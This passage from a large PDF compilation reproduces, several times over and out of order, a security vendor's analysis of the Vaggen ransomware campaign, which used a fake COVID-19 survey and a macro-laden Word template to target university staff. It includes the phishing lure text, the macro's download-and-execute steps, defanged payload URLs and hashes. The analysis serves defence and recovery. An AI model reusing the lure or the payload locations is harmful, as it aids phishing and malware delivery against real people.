event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1694 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1695 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1696 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1697 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1698 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1699 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1700 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1701 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1702 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1703 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1704 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1705 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1706 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1707 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1708 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1709 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1710 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1711 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1712 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1713 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1714 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1715 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1716 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1717 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1718 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1719 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1720 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1721 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1722 of 3467\n\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1723 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1724 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1725 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1726 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1727 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1728 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1729 of 